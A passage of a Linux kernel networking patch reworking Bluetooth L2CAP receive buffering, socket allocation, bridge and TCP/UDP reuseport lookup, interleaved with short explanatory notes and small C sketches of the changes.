+-		if (!__sock_queue_rcv_skb(sk, pi->rx_busy_skb))
+-			pi->rx_busy_skb = NULL;
+-		else
++	/* Attempt to put pending rx data in the socket buffer */
++	while (!list_empty(&pi->rx_busy)) {
++		struct l2cap_rx_busy *rx_busy =
++			list_first_entry(&pi->rx_busy,
++					 struct l2cap_rx_busy,
++					 list);
++		if (__sock_queue_rcv_skb(sk, rx_busy->skb) < 0)
+ 			goto done;
++		list_del(&rx_busy->list);
++		kfree(rx_busy);
+ 	}
+ 
+ 	/* Restore data flow when half of the receive buffer is
+ 	 * available.  This avoids resending large numbers of
+ 	 * frames.
+ 	 */
+-	if (atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf >> 1)
++	if (test_bit(CONN_LOCAL_BUSY, &pi->chan->conn_state) &&
++	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf >> 1)
+ 		l2cap_chan_busy(pi->chan, 0);
+ 
+ done:
+@@ -1483,17 +1516,20 @@ static struct l2cap_chan *l2cap_sock_new_connection_cb(struct l2cap_chan *chan)
+ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+ 	struct sock *sk = chan->data;
++	struct l2cap_pinfo *pi = l2cap_pi(sk);
+ 	int err;
+ 
+ 	lock_sock(sk);
+ 
+-	if (l2cap_pi(sk)->rx_busy_skb) {
++	if (chan->mode == L2CAP_MODE_ERTM && !list_empty(&pi->rx_busy)) {
+ 		err = -ENOMEM;
+ 		goto done;
+ 	}
+ 
+ 	if (chan->mode != L2CAP_MODE_ERTM &&
+-	    chan->mode != L2CAP_MODE_STREAMING) {
++	    chan->mode != L2CAP_MODE_STREAMING &&
++	    chan->mode != L2CAP_MODE_LE_FLOWCTL &&
++	    chan->mode != L2CAP_MODE_EXT_FLOWCTL) {
+ 		/* Even if no filter is attached, we could potentially
+ 		 * get errors from security modules, etc.
+ 		 */
+@@ -1504,7 +1540,9 @@ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ 
+ 	err = __sock_queue_rcv_skb(sk, skb);
+ 
+-	/* For ERTM, handle one skb that doesn't fit into the recv
++	l2cap_publish_rx_avail(chan);
++
++	/* For ERTM and LE, handle a skb that doesn't fit into the recv
+ 	 * buffer.  This is important to do because the data frames
+ 	 * have already been acked, so the skb cannot be discarded.
+ 	 *
+@@ -1513,8 +1551,18 @@ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	 * acked and reassembled until there is buffer space
+ 	 * available.
+ 	 */
+-	if (err < 0 && chan->mode == L2CAP_MODE_ERTM) {
+-		l2cap_pi(sk)->rx_busy_skb = skb;
++	if (err < 0 &&
++	    (chan->mode == L2CAP_MODE_ERTM ||
++	     chan->mode == L2CAP_MODE_LE_FLOWCTL ||
++	     chan->mode == L2CAP_MODE_EXT_FLOWCTL)) {
++		struct l2cap_rx_busy *rx_busy =
++			kmalloc(sizeof(*rx_busy), GFP_KERNEL);
++		if (!rx_busy) {
++			err = -ENOMEM;
++			goto done;
++		}
++		rx_busy->skb = skb;
++		list_add_tail(&rx_busy->list, &pi->rx_busy);
+ 		l2cap_chan_busy(chan, 1);
+ 		err = 0;
+ 	}
+@@ -1740,6 +1788,8 @@ static const struct l2cap_ops l2cap_chan_ops = {
+ 
+ static void l2cap_sock_destruct(struct sock *sk)
+ {
++	struct l2cap_rx_busy *rx_busy, *next;
++
+ 	BT_DBG("sk %p", sk);
+ 
+ 	if (l2cap_pi(sk)->chan) {
+@@ -1747,9 +1797,10 @@ static void l2cap_sock_destruct(struct sock *sk)
+ 		l2cap_chan_put(l2cap_pi(sk)->chan);
+ 	}
+ 
+-	if (l2cap_pi(sk)->rx_busy_skb) {
+-		kfree_skb(l2cap_pi(sk)->rx_busy_skb);
+-		l2cap_pi(sk)->rx_busy_skb = NULL;
++	list_for_each_entry_safe(rx_busy, next, &l2cap_pi(sk)->rx_busy, list) {
++		kfree_skb(rx_busy->skb);
++		list_del(&rx_busy->list);
++		kfree(rx_busy);
+ 	}
+ 
+ 	skb_queue_purge(&sk->sk_receive_queue);
+@@ -1833,6 +1884,8 @@ static void l2cap_sock_init(struct sock *sk, struct sock *parent)
+ 
+ 	chan->data = sk;
+ 	chan->ops = &l2cap_chan_ops;
++
++	l2cap_publish_rx_avail(chan);
+ }
+ 
+ static struct proto l2cap_proto = {
+@@ -1847,20 +1900,14 @@ static struct sock *l2cap_sock_alloc(struct net *net, struct socket *sock,
+ 	struct sock *sk;
+ 	struct l2cap_chan *chan;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &l2cap_proto, kern);
++	sk = bt_sock_alloc(net, sock, &l2cap_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = l2cap_sock_destruct;
+ 	sk->sk_sndtimeo = L2CAP_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state = BT_OPEN;
++	INIT_LIST_HEAD(&l2cap_pi(sk)->rx_busy);
+ 
+ 	chan = l2cap_chan_create();
+ 	if (!chan) {
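
l2cap_publish_rx_avail() deliberately under-reports free space: every incoming PDU also costs one sk_buff of metadata, so the advertised room is shrunk by an estimated sizeof(struct sk_buff) per expected PDU. A numeric sketch of that correction (the 232-byte sk_buff size is a stand-in, not the real value on any given kernel):

#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))
#define SKB_SIZE		232	/* stand-in for sizeof(struct sk_buff) */

static long usable_rx(long avail, int mps)
{
	int expected_skbs, overhead;

	if (avail <= 0)
		return 0;
	if (!mps)
		return -1;		/* unknown: let the peer send one packet */

	expected_skbs = DIV_ROUND_UP(avail, mps);
	overhead = expected_skbs * SKB_SIZE;
	return overhead < avail ? avail - overhead : -1;
}

int main(void)
{
	printf("%ld\n", usable_rx(4096, 64));	 /* metadata dominates: -1 */
	printf("%ld\n", usable_rx(65536, 1004)); /* large buffer: ~50 KB usable */
	return 0;
}
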
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index 4397e14ff560f..b54e8a530f55a 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -268,18 +268,16 @@ static struct proto rfcomm_proto = {
+ 	.obj_size	= sizeof(struct rfcomm_pinfo)
+ };
+ 
+-static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock, int proto, gfp_t prio, int kern)
++static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock,
++				      int proto, gfp_t prio, int kern)
+ {
+ 	struct rfcomm_dlc *d;
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &rfcomm_proto, kern);
++	sk = bt_sock_alloc(net, sock, &rfcomm_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	d = rfcomm_dlc_alloc(prio);
+ 	if (!d) {
+ 		sk_free(sk);
+@@ -298,11 +296,6 @@ static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock, int
+ 	sk->sk_sndbuf = RFCOMM_MAX_CREDITS * RFCOMM_DEFAULT_MTU * 10;
+ 	sk->sk_rcvbuf = RFCOMM_MAX_CREDITS * RFCOMM_DEFAULT_MTU * 10;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	bt_sock_link(&rfcomm_sk_list, sk);
+ 
+ 	BT_DBG("sk %p", sk);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 301cf802d32c4..a3bbe04b11383 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -484,21 +484,13 @@ static struct sock *sco_sock_alloc(struct net *net, struct socket *sock,
+ {
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &sco_proto, kern);
++	sk = bt_sock_alloc(net, sock, &sco_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = sco_sock_destruct;
+ 	sk->sk_sndtimeo = SCO_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	sco_pi(sk)->setting = BT_VOICE_CVSD_16BIT;
+ 	sco_pi(sk)->codec.id = BT_CODEC_CVSD;
+ 	sco_pi(sk)->codec.cid = 0xffff;
+diff --git a/net/bridge/br_device.c b/net/bridge/br_device.c
+index b82906fc999a3..036ae99d09841 100644
+--- a/net/bridge/br_device.c
++++ b/net/bridge/br_device.c
+@@ -27,6 +27,7 @@ EXPORT_SYMBOL_GPL(nf_br_ops);
+ /* net device transmit always called with BH disabled */
+ netdev_tx_t br_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
++	enum skb_drop_reason reason = pskb_may_pull_reason(skb, ETH_HLEN);
+ 	struct net_bridge_mcast_port *pmctx_null = NULL;
+ 	struct net_bridge *br = netdev_priv(dev);
+ 	struct net_bridge_mcast *brmctx = &br->multicast_ctx;
+@@ -38,6 +39,11 @@ netdev_tx_t br_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	const unsigned char *dest;
+ 	u16 vid = 0;
+ 
++	if (unlikely(reason != SKB_NOT_DROPPED_YET)) {
++		kfree_skb_reason(skb, reason);
++		return NETDEV_TX_OK;
++	}
++
+ 	memset(skb->cb, 0, sizeof(struct br_input_skb_cb));
+ 
+ 	rcu_read_lock();
+diff --git a/net/bridge/br_mst.c b/net/bridge/br_mst.c
+index ee680adcee179..3c66141d34d62 100644
+--- a/net/bridge/br_mst.c
++++ b/net/bridge/br_mst.c
+@@ -78,7 +78,7 @@ static void br_mst_vlan_set_state(struct net_bridge_port *p, struct net_bridge_v
+ {
+ 	struct net_bridge_vlan_group *vg = nbp_vlan_group(p);
+ 
+-	if (v->state == state)
++	if (br_vlan_get_state(v) == state)
+ 		return;
+ 
+ 	br_vlan_set_state(v, state);
+@@ -100,11 +100,12 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	};
+ 	struct net_bridge_vlan_group *vg;
+ 	struct net_bridge_vlan *v;
+-	int err;
++	int err = 0;
+ 
++	rcu_read_lock();
+ 	vg = nbp_vlan_group(p);
+ 	if (!vg)
+-		return 0;
++		goto out;
+ 
+ 	/* MSTI 0 (CST) state changes are notified via the regular
+ 	 * SWITCHDEV_ATTR_ID_PORT_STP_STATE.
+@@ -112,17 +113,20 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	if (msti) {
+ 		err = switchdev_port_attr_set(p->dev, &attr, extack);
+ 		if (err && err != -EOPNOTSUPP)
+-			return err;
++			goto out;
+ 	}
+ 
+-	list_for_each_entry(v, &vg->vlan_list, vlist) {
++	err = 0;
++	list_for_each_entry_rcu(v, &vg->vlan_list, vlist) {
+ 		if (v->brvlan->msti != msti)
+ 			continue;
+ 
+ 		br_mst_vlan_set_state(p, v, state);
+ 	}
+ 
+-	return 0;
++out:
++	rcu_read_unlock();
++	return err;
+ }
+ 
+ static void br_mst_vlan_sync_state(struct net_bridge_vlan *pv, u16 msti)
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 65284eeec7de5..20d8b9195ef60 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10300,8 +10300,9 @@ static struct net_device *netdev_wait_allrefs_any(struct list_head *list)
+ 			rebroadcast_time = jiffies;
+ 		}
+ 
++		rcu_barrier();
++
+ 		if (!wait) {
+-			rcu_barrier();
+ 			wait = WAIT_REFS_MIN_MSECS;
+ 		} else {
+ 			msleep(wait);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 9408dc3bb42d3..cc013be9b02c4 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -744,6 +744,22 @@ int inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ }
+ EXPORT_SYMBOL(inet_stream_connect);
+ 
++void __inet_accept(struct socket *sock, struct socket *newsock, struct sock *newsk)
++{
++	sock_rps_record_flow(newsk);
++	WARN_ON(!((1 << newsk->sk_state) &
++		  (TCPF_ESTABLISHED | TCPF_SYN_RECV |
++		   TCPF_FIN_WAIT1 | TCPF_FIN_WAIT2 |
++		   TCPF_CLOSING | TCPF_CLOSE_WAIT |
++		   TCPF_CLOSE)));
++
++	if (test_bit(SOCK_SUPPORT_ZC, &sock->flags))
++		set_bit(SOCK_SUPPORT_ZC, &newsock->flags);
++	sock_graft(newsk, newsock);
++
++	newsock->state = SS_CONNECTED;
++}
++
+ /*
+  *	Accept a pending connection. The TCP layer now gives BSD semantics.
+  */
+@@ -757,24 +773,12 @@ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 	/* IPV6_ADDRFORM can change sk->sk_prot under us. */
+ 	sk2 = READ_ONCE(sk1->sk_prot)->accept(sk1, flags, &err, kern);
+ 	if (!sk2)
+-		goto do_err;
++		return err;
+ 
+ 	lock_sock(sk2);
+-
+-	sock_rps_record_flow(sk2);
+-	WARN_ON(!((1 << sk2->sk_state) &
+-		  (TCPF_ESTABLISHED | TCPF_SYN_RECV |
+-		  TCPF_CLOSE_WAIT | TCPF_CLOSE)));
+-
+-	if (test_bit(SOCK_SUPPORT_ZC, &sock->flags))
+-		set_bit(SOCK_SUPPORT_ZC, &newsock->flags);
+-	sock_graft(sk2, newsock);
+-
+-	newsock->state = SS_CONNECTED;
+-	err = 0;
++	__inet_accept(sock, newsock, sk2);
+ 	release_sock(sk2);
+-do_err:
+-	return err;
++	return 0;
+ }
+ EXPORT_SYMBOL(inet_accept);
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 0ad25e6783ac7..321f509f23473 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -28,9 +28,9 @@
+ #include <net/tcp.h>
+ #include <net/sock_reuseport.h>
+ 
+-static u32 inet_ehashfn(const struct net *net, const __be32 laddr,
+-			const __u16 lport, const __be32 faddr,
+-			const __be16 fport)
++u32 inet_ehashfn(const struct net *net, const __be32 laddr,
++		 const __u16 lport, const __be32 faddr,
++		 const __be16 fport)
+ {
+ 	static u32 inet_ehash_secret __read_mostly;
+ 
+@@ -39,6 +39,7 @@ static u32 inet_ehashfn(const struct net *net, const __be32 laddr,
+ 	return __inet_ehashfn(laddr, lport, faddr, fport,
+ 			      inet_ehash_secret + net_hash_mix(net));
+ }
++EXPORT_SYMBOL_GPL(inet_ehashfn);
+ 
+ /* This function handles inet_sock, but also timewait and request sockets
+  * for IPv4/IPv6.
+@@ -338,20 +339,25 @@ static inline int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static inline struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-					    struct sk_buff *skb, int doff,
+-					    __be32 saddr, __be16 sport,
+-					    __be32 daddr, unsigned short hnum)
++INDIRECT_CALLABLE_DECLARE(inet_ehashfn_t udp_ehashfn);
++
++struct sock *inet_lookup_reuseport(struct net *net, struct sock *sk,
++				   struct sk_buff *skb, int doff,
++				   __be32 saddr, __be16 sport,
++				   __be32 daddr, unsigned short hnum,
++				   inet_ehashfn_t *ehashfn)
+ {
+ 	struct sock *reuse_sk = NULL;
+ 	u32 phash;
+ 
+ 	if (sk->sk_reuseport) {
+-		phash = inet_ehashfn(net, daddr, hnum, saddr, sport);
++		phash = INDIRECT_CALL_2(ehashfn, udp_ehashfn, inet_ehashfn,
++					net, daddr, hnum, saddr, sport);
+ 		reuse_sk = reuseport_select_sock(sk, phash, skb, doff);
+ 	}
+ 	return reuse_sk;
+ }
++EXPORT_SYMBOL_GPL(inet_lookup_reuseport);
+ 
+ /*
+  * Here are some nice properties to exploit here. The BSD API
+@@ -375,8 +381,8 @@ static struct sock *inet_lhash2_lookup(struct net *net,
+ 	sk_nulls_for_each_rcu(sk, node, &ilb2->nulls_head) {
+ 		score = compute_score(sk, net, hnum, daddr, dif, sdif);
+ 		if (score > hiscore) {
+-			result = lookup_reuseport(net, sk, skb, doff,
+-						  saddr, sport, daddr, hnum);
++			result = inet_lookup_reuseport(net, sk, skb, doff,
++						       saddr, sport, daddr, hnum, inet_ehashfn);
+ 			if (result)
+ 				return result;
+ 
+@@ -405,7 +411,8 @@ static inline struct sock *inet_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum);
++	reuse_sk = inet_lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum,
++					 inet_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
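
inet_lookup_reuseport() now receives the hash function as a parameter, and INDIRECT_CALL_2() lets the compiler turn that indirect call into direct calls for the two expected targets, sparing a retpoline on mitigated builds. A rough stand-alone model of what the macro reduces to (simplified; the real macro lives in include/linux/indirect_call_wrapper.h):

#include <stdio.h>

typedef unsigned int (hashfn_t)(unsigned int a, unsigned int b);

static unsigned int inet_hash(unsigned int a, unsigned int b) { return a ^ b; }
static unsigned int udp_hash(unsigned int a, unsigned int b)  { return a + b; }

/* Simplified model of INDIRECT_CALL_2(f, f2, f1, ...): compare the
 * pointer against the likely targets and call them directly. */
#define CALL_2(f, f2, f1, ...)				\
	((f) == (f2) ? f2(__VA_ARGS__) :		\
	 (f) == (f1) ? f1(__VA_ARGS__) : (f)(__VA_ARGS__))

static unsigned int lookup(hashfn_t *ehashfn, unsigned int a, unsigned int b)
{
	return CALL_2(ehashfn, udp_hash, inet_hash, a, b);
}

int main(void)
{
	printf("%u %u\n", lookup(inet_hash, 3, 5), lookup(udp_hash, 3, 5));
	return 0;
}
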
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index 69e3317996043..73e66a088e25e 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -58,6 +58,8 @@ __be32 nf_tproxy_laddr4(struct sk_buff *skb, __be32 user_laddr, __be32 daddr)
+ 
+ 	laddr = 0;
+ 	indev = __in_dev_get_rcu(skb->dev);
++	if (!indev)
++		return daddr;
+ 
+ 	in_dev_for_each_ifa_rcu(ifa, indev) {
+ 		if (ifa->ifa_flags & IFA_F_SECONDARY)
+diff --git a/net/ipv4/tcp_dctcp.c b/net/ipv4/tcp_dctcp.c
+index 2a6c0dd665a4c..863aab1860556 100644
+--- a/net/ipv4/tcp_dctcp.c
++++ b/net/ipv4/tcp_dctcp.c
+@@ -57,7 +57,18 @@ struct dctcp {
+ };
+ 
+ static unsigned int dctcp_shift_g __read_mostly = 4; /* g = 1/2^4 */
+-module_param(dctcp_shift_g, uint, 0644);
++
++static int dctcp_shift_g_set(const char *val, const struct kernel_param *kp)
++{
++	return param_set_uint_minmax(val, kp, 0, 10);
++}
++
++static const struct kernel_param_ops dctcp_shift_g_ops = {
++	.set = dctcp_shift_g_set,
++	.get = param_get_uint,
++};
++
++module_param_cb(dctcp_shift_g, &dctcp_shift_g_ops, &dctcp_shift_g, 0644);
+ MODULE_PARM_DESC(dctcp_shift_g, "parameter g for updating dctcp_alpha");
+ 
+ static unsigned int dctcp_alpha_on_init __read_mostly = DCTCP_MAX_ALPHA;
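
A writable parameter used as a shift count has to be bounded, since shifting a 32-bit value by 32 or more is undefined, so the bare module_param() becomes module_param_cb() with a setter that clamps via param_set_uint_minmax(). The same recipe applied to another bounded knob would look like this (kernel-style sketch; the "depth" parameter is invented):

/* Assumes <linux/moduleparam.h>. */
static unsigned int depth __read_mostly = 4;

static int depth_set(const char *val, const struct kernel_param *kp)
{
	/* reject anything outside [1, 16] at write time */
	return param_set_uint_minmax(val, kp, 1, 16);
}

static const struct kernel_param_ops depth_ops = {
	.set = depth_set,
	.get = param_get_uint,
};

module_param_cb(depth, &depth_ops, &depth, 0644);
MODULE_PARM_DESC(depth, "queue depth, clamped to 1..16");
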
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 5dcb969cb5e9c..befa848fb820c 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -1771,7 +1771,7 @@ int tcp_v4_early_demux(struct sk_buff *skb)
+ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 		     enum skb_drop_reason *reason)
+ {
+-	u32 limit, tail_gso_size, tail_gso_segs;
++	u32 tail_gso_size, tail_gso_segs;
+ 	struct skb_shared_info *shinfo;
+ 	const struct tcphdr *th;
+ 	struct tcphdr *thtail;
+@@ -1780,6 +1780,7 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	bool fragstolen;
+ 	u32 gso_segs;
+ 	u32 gso_size;
++	u64 limit;
+ 	int delta;
+ 
+ 	/* In case all data was pulled from skb frags (in __pskb_pull_tail()),
+@@ -1877,7 +1878,13 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	__skb_push(skb, hdrlen);
+ 
+ no_coalesce:
+-	limit = (u32)READ_ONCE(sk->sk_rcvbuf) + (u32)(READ_ONCE(sk->sk_sndbuf) >> 1);
++	/* sk->sk_backlog.len is reset only at the end of __release_sock().
++	 * Both sk->sk_backlog.len and sk->sk_rmem_alloc could reach
++	 * sk_rcvbuf in normal conditions.
++	 */
++	limit = ((u64)READ_ONCE(sk->sk_rcvbuf)) << 1;
++
++	limit += ((u32)READ_ONCE(sk->sk_sndbuf)) >> 1;
+ 
+ 	/* Only socket owner can try to collapse/prune rx queues
+ 	 * to reduce memory overhead, so add a little headroom here.
+@@ -1885,6 +1892,8 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	 */
+ 	limit += 64 * 1024;
+ 
++	limit = min_t(u64, limit, UINT_MAX);
++
+ 	if (unlikely(sk_add_backlog(sk, skb, limit))) {
+ 		bh_unlock_sock(sk);
+ 		*reason = SKB_DROP_REASON_SOCKET_BACKLOG;
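
The limit is now computed in 64 bits: twice sk_rcvbuf (itself up to INT_MAX) plus half of sk_sndbuf can overflow u32, so the sum is formed as u64 and clamped back to UINT_MAX only at the end. A stand-alone demonstration of why the widening matters:

#include <stdio.h>
#include <stdint.h>
#include <limits.h>

int main(void)
{
	uint32_t rcvbuf = 0x7fffffff, sndbuf = 0x7fffffff;

	/* 32-bit arithmetic silently wraps around... */
	uint32_t wrapped = rcvbuf * 2u + (sndbuf >> 1) + 64 * 1024;

	/* ...64-bit arithmetic keeps the true sum, then clamps. */
	uint64_t limit = ((uint64_t)rcvbuf << 1) + (sndbuf >> 1) + 64 * 1024;
	if (limit > UINT_MAX)
		limit = UINT_MAX;

	printf("wrapped: %u  clamped: %llu\n",
	       (unsigned)wrapped, (unsigned long long)limit);
	return 0;
}
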
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 39fae7581d350..b8f93c1479ae1 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -400,9 +400,9 @@ static int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static u32 udp_ehashfn(const struct net *net, const __be32 laddr,
+-		       const __u16 lport, const __be32 faddr,
+-		       const __be16 fport)
++INDIRECT_CALLABLE_SCOPE
++u32 udp_ehashfn(const struct net *net, const __be32 laddr, const __u16 lport,
++		const __be32 faddr, const __be16 fport)
+ {
+ 	static u32 udp_ehash_secret __read_mostly;
+ 
+@@ -412,22 +412,6 @@ static u32 udp_ehashfn(const struct net *net, const __be32 laddr,
+ 			      udp_ehash_secret + net_hash_mix(net));
+ }
+ 
+-static struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-				     struct sk_buff *skb,
+-				     __be32 saddr, __be16 sport,
+-				     __be32 daddr, unsigned short hnum)
+-{
+-	struct sock *reuse_sk = NULL;
+-	u32 hash;
+-
+-	if (sk->sk_reuseport && sk->sk_state != TCP_ESTABLISHED) {
+-		hash = udp_ehashfn(net, daddr, hnum, saddr, sport);
+-		reuse_sk = reuseport_select_sock(sk, hash, skb,
+-						 sizeof(struct udphdr));
+-	}
+-	return reuse_sk;
+-}
+-
+ /* called with rcu_read_lock() */
+ static struct sock *udp4_lib_lookup2(struct net *net,
+ 				     __be32 saddr, __be16 sport,
+@@ -438,15 +422,28 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ {
+ 	struct sock *sk, *result;
+ 	int score, badness;
++	bool need_rescore;
+ 
+ 	result = NULL;
+ 	badness = 0;
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+-		score = compute_score(sk, net, saddr, sport,
+-				      daddr, hnum, dif, sdif);
++		need_rescore = false;
++rescore:
++		score = compute_score(need_rescore ? result : sk, net, saddr,
++				      sport, daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+ 			badness = score;
+-			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++
++			if (need_rescore)
++				continue;
++
++			if (sk->sk_state == TCP_ESTABLISHED) {
++				result = sk;
++				continue;
++			}
++
++			result = inet_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++						       saddr, sport, daddr, hnum, udp_ehashfn);
+ 			if (!result) {
+ 				result = sk;
+ 				continue;
+@@ -460,9 +457,14 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ 			if (IS_ERR(result))
+ 				continue;
+ 
+-			badness = compute_score(result, net, saddr, sport,
+-						daddr, hnum, dif, sdif);
+-
++			/* compute_score() is too long to be inlined, and
++			 * calling it again here yields measurable overhead
++			 * for some workloads. Work around this by jumping
++			 * backwards to rescore 'result'.
++			 */
++			need_rescore = true;
++			goto rescore;
+ 		}
+ 	}
+ 	return result;
+@@ -485,7 +487,8 @@ static struct sock *udp4_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++	reuse_sk = inet_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++					 saddr, sport, daddr, hnum, udp_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
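
The UDP lookup keeps a best-so-far socket; when reuseport selection substitutes a different socket from the group, that substitute's score is unknown, so the loop jumps back and scores 'result' once instead of unconditionally rescoring on every candidate. The control flow reduced to a runnable skeleton (the scoring and selection functions are stand-ins):

#include <stdio.h>
#include <stdbool.h>

static int score(int cand)        { return cand % 7; }		   /* stand-in scorer */
static int select_group(int cand) { return cand % 2 ? cand + 1 : 0; } /* stand-in pick */

static int best_of(const int *cands, int n)
{
	int result = 0, badness = 0;

	for (int i = 0; i < n; i++) {
		bool need_rescore = false;
		int s, sub;
rescore:
		s = score(need_rescore ? result : cands[i]);
		if (s > badness) {
			badness = s;
			if (need_rescore)	/* substitute kept its lead */
				continue;
			sub = select_group(cands[i]);
			result = sub ? sub : cands[i];
			if (sub) {		/* score the substitute once */
				need_rescore = true;
				goto rescore;
			}
		}
	}
	return result;
}

int main(void)
{
	int cands[] = { 3, 10, 20 };
	printf("best: %d\n", best_of(cands, 3));
	return 0;
}
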
+diff --git a/net/ipv6/inet6_hashtables.c b/net/ipv6/inet6_hashtables.c
+index b64b49012655e..3616225c89ef6 100644
+--- a/net/ipv6/inet6_hashtables.c
++++ b/net/ipv6/inet6_hashtables.c
+@@ -39,6 +39,7 @@ u32 inet6_ehashfn(const struct net *net,
+ 	return __inet6_ehashfn(lhash, lport, fhash, fport,
+ 			       inet6_ehash_secret + net_hash_mix(net));
+ }
++EXPORT_SYMBOL_GPL(inet6_ehashfn);
+ 
+ /*
+  * Sockets in TCP_CLOSE state are _always_ taken out of the hash, so
+@@ -111,22 +112,27 @@ static inline int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static inline struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-					    struct sk_buff *skb, int doff,
+-					    const struct in6_addr *saddr,
+-					    __be16 sport,
+-					    const struct in6_addr *daddr,
+-					    unsigned short hnum)
++INDIRECT_CALLABLE_DECLARE(inet6_ehashfn_t udp6_ehashfn);
++
++struct sock *inet6_lookup_reuseport(struct net *net, struct sock *sk,
++				    struct sk_buff *skb, int doff,
++				    const struct in6_addr *saddr,
++				    __be16 sport,
++				    const struct in6_addr *daddr,
++				    unsigned short hnum,
++				    inet6_ehashfn_t *ehashfn)
+ {
+ 	struct sock *reuse_sk = NULL;
+ 	u32 phash;
+ 
+ 	if (sk->sk_reuseport) {
+-		phash = inet6_ehashfn(net, daddr, hnum, saddr, sport);
++		phash = INDIRECT_CALL_INET(ehashfn, udp6_ehashfn, inet6_ehashfn,
++					   net, daddr, hnum, saddr, sport);
+ 		reuse_sk = reuseport_select_sock(sk, phash, skb, doff);
+ 	}
+ 	return reuse_sk;
+ }
++EXPORT_SYMBOL_GPL(inet6_lookup_reuseport);
+ 
+ /* called with rcu_read_lock() */
+ static struct sock *inet6_lhash2_lookup(struct net *net,
+@@ -143,8 +149,8 @@ static struct sock *inet6_lhash2_lookup(struct net *net,
